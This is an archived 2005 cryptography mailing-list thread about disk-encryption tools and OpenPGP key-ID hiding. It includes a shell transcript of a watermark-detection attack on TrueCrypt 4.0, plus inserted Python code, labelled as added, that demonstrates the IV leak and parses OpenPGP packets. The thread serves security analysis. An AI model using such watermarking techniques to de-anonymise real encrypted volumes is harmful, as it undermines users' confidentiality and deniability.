Re: gonzo cryptography; how would you improve existing cryptosystems?
On Thu, 17 Nov 2005, Jari Ruusu wrote:
> Unfortunately truecrypt is just another broken device crypto implementation
> that uses good ciphers in an insecure way. Specially crafted static bit
> patterns are easily detectable through that kind of bad crypto.

Looks like they have fixed it: version 4.1 (2005-11-25) supports tweakable
narrow-block encryption (LRW).

--
Regards,
ASK

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
Thomas Sjögren wrote:
> On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote:
> > The only thing close that I've seen is Bestcrypt, which is commercial
> > and has a Linux and Windows port. I don't recall if the Linux port
> > came with source or not.
>
> http://www.truecrypt.org/
>
> TrueCrypt
> Free open-source disk encryption software for Windows XP/2000/2003 and Linux

Unfortunately truecrypt is just another broken device crypto implementation
that uses good ciphers in an insecure way. Specially crafted static bit
patterns are easily detectable through that kind of bad crypto.

Requirements: (1) used ciphers must have 128-bit block size and (2) file
system where bit patterns are stored must have 2K or larger soft block size.
Many popular linux file systems meet those requirements.

Uuencoded exploit source code is included in this email.

# truecrypt --device-number 0 --filesystem ext2 /tmp/container1.tc /mnt
Enter password for '/tmp/container1.tc':
# mount | grep /mnt
/dev/mapper/truecrypt0 on /mnt type ext2 (rw)
# tune2fs -l /dev/mapper/truecrypt0 | grep Block size
Block size:               4096
# ./create-watermark-encodings-truecrypt 10:44 11:55 12:66 666:77 /mnt/foo1
# truecrypt -d /mnt
# truecrypt -l
truecrypt: Kernel module not loaded
# ./detect-watermark-encodings-truecrypt /tmp/container1.tc
5241344 bytes scanned
watermark encoding 10, count 44
watermark encoding 11, count 55
watermark encoding 12, count 66
watermark encoding 666, count 77
# uname -s -r
Linux 2.6.14.2
# truecrypt --version | head -n 1
truecrypt 4.0

--
Jari Ruusu  1024R/3A220F51 = 5B 4B F9 BB D3 3F 52 E9  DB 1D EB E3 24 0E A9 DD
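To make the two points in this exchange concrete (Jari's claim that a predictable per-sector IV lets crafted bit patterns show through the ciphertext, and ASK's note that 4.1 moved to tweakable LRW), here is an added Python example that is not from the thread or from TrueCrypt. It encrypts two neighbouring sectors once under CBC with the sector number as IV and once under LRW, using a stand-in Feistel block cipher and constructed keys, and reports whether a crafted pattern is visible without the key; the toy cipher, the keys and the choice to start LRW block indices at 1 are assumptions of this example.

```python
import hashlib, hmac
K1, K2 = bytes(range(16)), bytes(range(16, 32))  # constructed demo keys, not real ones
POLY = (1 << 128) | 0x87  # x^128 + x^7 + x^2 + x + 1, the GF(2^128) modulus of LRW/XTS

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def gf128_mul(a: int, b: int) -> int:
    """Carry-less multiply in GF(2^128), reduced modulo POLY."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a >> 128:
            a ^= POLY
        b >>= 1
    return r

def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in 128-bit block cipher (4-round Feistel over HMAC-SHA256), NOT AES; the leak is in the mode."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        f = hmac.new(key + bytes([rnd]), right, hashlib.sha256).digest()[:8]
        left, right = right, xor(left, f)
    return left + right

def cbc_plain_sector(key: bytes, sector_no: int, data: bytes) -> bytes:
    """CBC with IV = sector number: a predictable-IV scheme of the kind Jari's post attacks."""
    out, prev = [], sector_no.to_bytes(16, "little")
    for i in range(0, len(data), 16):
        prev = toy_block_encrypt(key, xor(data[i:i + 16], prev))
        out.append(prev)
    return b"".join(out)

def lrw_sector(key: bytes, tweak_key: bytes, sector_no: int, data: bytes) -> bytes:
    """LRW: C = E(P ^ T) ^ T with T = K2 * block_index in GF(2^128); indices start at 1 here (assumption)."""
    out, k2 = [], int.from_bytes(tweak_key, "big")
    for i in range(0, len(data), 16):
        t = gf128_mul(k2, sector_no * 32 + i // 16 + 1).to_bytes(16, "big")  # 32 blocks per 512-byte sector
        out.append(xor(toy_block_encrypt(key, xor(data[i:i + 16], t)), t))
    return b"".join(out)

def watermark_visible(encrypt) -> bool:
    """Pattern in sector n, pattern ^ (n ^ (n+1)) in sector n+1: equal first ciphertext blocks = visible without key."""
    n, pattern = 1000, b"\x42" * 16
    delta = (n ^ (n + 1)).to_bytes(16, "little")
    c1 = encrypt(n, pattern + bytes(496))
    c2 = encrypt(n + 1, xor(pattern, delta) + bytes(496))
    return c1[:16] == c2[:16]
```

With the sector-number IV the two first ciphertext blocks collide regardless of the key, which is exactly what a scanner over the raw container can count; with LRW the keyed tweak removes the relation and the pattern is not visible.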
Re: gonzo cryptography; how would you improve existing cryptosystems?
On 4 Nov 2005, at 5:23 PM, Travis H. wrote:
> For example, pgp doesn't hide the key IDs of the addressees.

But OpenPGP does. Here's an extract from RFC 2440:

   5.1. Public-Key Encrypted Session Key Packets (Tag 1)

   [...]

   An implementation MAY accept or use a Key ID of zero as a wild card
   or speculative Key ID. In this case, the receiving implementation
   would try all available private keys, checking for a valid decrypted
   session key. This format helps reduce traffic analysis of messages.

Now, there has been much discussion about how useful this is, and there are
other related issues like how you do the UI for such a thing. But the
*protocol* handles it.

You might also want to look at the PFS extensions for OpenPGP:

http://www.apache-ssl.org/openpgp-pfs.txt

and even OTR, which is very cool in its own right (and is designed to take
care of the sort of edge conditions all of these other things have):

http://www.cypherpunks.ca/otr/

Jon
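The wild-card rule quoted above only makes sense once you see where the Key ID sits in the packet. Here is an added Python example, not from the thread and not from any OpenPGP implementation: it parses a single RFC 2440 packet header (old or new format), decodes a version 3 tag-1 body, and picks the private keys a receiver should try, treating an all-zero Key ID as "try everything". The keyring is a constructed dict of key ID to owner, and build_pkesk is a helper of this example that fabricates an RSA (algorithm 1) packet for testing.

```python
# Minimal RFC 2440 PKESK handling for the wild-card Key ID rule (example code).
WILDCARD_KEY_ID = bytes(8)

def parse_packet(raw: bytes):
    """Return (tag, body) for one old- or new-format packet header."""
    ctb = raw[0]
    if not ctb & 0x80:
        raise ValueError("bit 7 of the packet tag octet must be set")
    if ctb & 0x40:                       # new format: tag in the low 6 bits
        tag, first = ctb & 0x3F, raw[1]
        if first < 192:
            length, body_at = first, 2
        elif first < 224:
            length, body_at = ((first - 192) << 8) + raw[2] + 192, 3
        elif first == 255:
            length, body_at = int.from_bytes(raw[2:6], "big"), 6
        else:
            raise ValueError("partial body lengths not supported here")
    else:                                # old format: tag in bits 5..2, length type in bits 1..0
        tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
        if ltype == 3:
            raise ValueError("indeterminate length not supported here")
        n = 1 << ltype
        length, body_at = int.from_bytes(raw[1:1 + n], "big"), 1 + n
    return tag, raw[body_at:body_at + length]

def parse_pkesk(raw: bytes) -> dict:
    """Decode a tag-1 body: version 3, 8-octet Key ID, 1-octet algorithm, then MPI(s)."""
    tag, body = parse_packet(raw)
    if tag != 1 or body[0] != 3:
        raise ValueError("not a version 3 PKESK packet")
    return {"key_id": body[1:9], "pk_algo": body[9], "mpis": body[10:]}

def candidate_keys(pkesk: dict, keyring: dict) -> list:
    """Keys a receiver should try: all of them for the wild-card Key ID (the sender hid the
    addressee), otherwise only the named key if we hold it."""
    if pkesk["key_id"] == WILDCARD_KEY_ID:
        return list(keyring)
    return [k for k in keyring if k == pkesk["key_id"]]

def build_pkesk(key_id: bytes, mpi: bytes, new_format: bool = False) -> bytes:
    """Fabricate an RSA (algorithm 1) PKESK with a one-octet body length, for tests only."""
    mpi_field = int.from_bytes(mpi, "big").bit_length().to_bytes(2, "big") + mpi
    body = b"\x03" + key_id + b"\x01" + mpi_field
    header = bytes([0xC1, len(body)]) if new_format else bytes([0x84, len(body)])
    return header + body
```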
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Fri, 4 Nov 2005, Travis H. wrote:
> PS: There's a paper on cryptanalyzing CFS on my homepage below. I got to
> successfully use classical cryptanalysis on a relatively modern system!
> That is a rare joy. CFS really needs a re-write, there's no real good
> alternatives for cross-platform filesystem encryption to my knowledge.

On Mon, 7 Nov 2005, Jason Holt wrote:
> Take a look at ecryptfs before rewriting cfs:
> http://sourceforge.net/projects/ecryptfs

Nice, but linux-only and requires special kernel support. cfs supports lots
and lots of different OSs and doesn't require kernel modes. So far as I know,
in this regard cfs is unique among cryptographic filesystems.

ciao,

--
-- Jonathan Thornburg [EMAIL PROTECTED]
   Max-Planck-Institut fuer Gravitationsphysik (Albert-Einstein-Institut),
   Golm, Germany, Old Europe     http://www.aei.mpg.de/~jthorn/home.html
   Washing one's hands of the conflict between the powerful and the
   powerless means to side with the powerful, not to be neutral.
                                      -- quote by Freire / poster by Oxfam
Re: gonzo cryptography; how would you improve existing cryptosystems?
> Nice, but linux-only and requires special kernel support. cfs supports lots
> and lots of different OSs and doesn't require kernel modes. So far as I know,
> in this regard cfs is unique among cryptographic filesystems.

The only thing close that I've seen is Bestcrypt, which is commercial and has
a Linux and Windows port. I don't recall if the Linux port came with source or
not. I had problems with the init script hanging the boot process, or at least
delaying it significantly, so I uninstalled it until I could devote the time
to analyze what was going on. Right after installation I tried using it to
read a container copied from a corrupted Windows machine, but was not
successful. It is unclear to me if this was due to the corruption which
occurred, or some kind of incompatibility between the Windows and Linux ports.

--
http://www.lightconsulting.com/~travis/ -->
We already have enough fast, insecure systems. -- Schneier & Ferguson
GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Mon, 7 Nov 2005, Jason Holt wrote:
> Take a look at ecryptfs before rewriting cfs

... or at TrueCrypt (which works on linux and windows):
http://www.truecrypt.org/downloads.php

--
Regards,
ASK
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote:
> The only thing close that I've seen is Bestcrypt, which is commercial and
> has a Linux and Windows port. I don't recall if the Linux port came with
> source or not.

http://www.truecrypt.org/

TrueCrypt
Free open-source disk encryption software for Windows XP/2000/2003 and Linux

Main Features:

* It can create a virtual encrypted disk within a file and mount it as a
  real disk.

* It can encrypt an entire hard disk partition or a device, such as USB
  memory stick, floppy disk, etc.

* Provides two levels of plausible deniability, in case an adversary forces
  you to reveal the password:
  1) Hidden volume (more information may be found here).
  2) No TrueCrypt volume can be identified (TrueCrypt volumes cannot be
     distinguished from random data).

* Encryption algorithms: AES-256, Blowfish (448-bit key), CAST5, Serpent
  (256-bit key), Triple DES, and Twofish (256-bit key). Supports cascading
  (e.g., AES-Twofish-Serpent).

* Based on Encryption for the Masses (E4M) 2.02a, which was conceived in 1997.

Further information regarding the features of the software may be found in
the documentation.

Complete source code (in C) of the latest stable version of TrueCrypt for all
supported operating systems and all supported hardware platforms is available
from http://www.truecrypt.org/downloads.php

/Thomas
--

signature.asc
Description: Digital signature
Re: gonzo cryptography; how would you improve existing cryptosystems?
> Does ISAKMP do encryption where the input is meant to be secret, instead
> of the key?

I meant MAC, not encryption, sorry. Of course encryption inputs are secret.

--
http://www.lightconsulting.com/~travis/ -->
We already have enough fast, insecure systems. -- Schneier & Ferguson
GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Fri, 4 Nov 2005, Travis H. wrote:
> PS: There's a paper on cryptanalyzing CFS on my homepage below. I got to
> successfully use classical cryptanalysis on a relatively modern system!
> That is a rare joy. CFS really needs a re-write, there's no real good
> alternatives for cross-platform filesystem encryption to my knowledge.

Take a look at ecryptfs before rewriting cfs:
http://sourceforge.net/projects/ecryptfs

-J